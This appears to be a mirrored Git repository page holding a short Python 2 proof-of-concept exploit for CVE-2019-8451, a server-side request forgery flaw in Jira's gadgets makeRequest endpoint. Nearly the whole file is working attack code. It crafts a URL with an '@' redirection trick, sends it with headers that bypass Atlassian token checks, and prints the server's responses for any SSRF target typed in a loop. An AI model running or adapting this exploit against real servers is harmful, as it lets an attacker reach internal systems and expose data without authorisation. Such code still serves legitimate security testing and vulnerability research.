admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-08-13 03:17:26 +00:00
Code Issues Packages Projects Releases Wiki Activity
Penetration_Testing_POC/CVE-2019-8451/CVE-2019-8451.py
mr-xn 43e577f84e add CVE-2019-8451
2019-09-26 19:53:58 +08:00

42 lines
1.2 KiB
Python
Raw Blame History

import requests
import sys
# http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:8080@www.baidu.com/
def ssrf_poc(url, ssrf_url):
if url[-1] == '/':
url = url[:-1]
else:
url = url
vuln_url = url + "/plugins/servlet/gadgets/makeRequest?url=" + url + '@' + ssrf_url
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
"Accept": "*/*",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"X-Atlassian-Token": "no-check",
"Connection": "close"
}
r = requests.get(url=vuln_url, headers=headers)
if r.status_code == 200 and 'set-cookie' in r.content:
print "\n>>>>Send poc Success!\n"
print 'X-AUSERNAME= %s' % r.headers.get('X-AUSERNAME')
print "\n>>>>vuln_url= " + vuln_url + '\n'
print r.content
else:
print "No Vuln Exit!"
if __name__ == "__main__":
while True:
print
ssrf_url = raw_input(">>>>SSRF URL: ")
url = "http://www.jas502n.com:8080"
ssrf_poc(url, ssrf_url)
Reference in New Issue View Git Blame Copy Permalink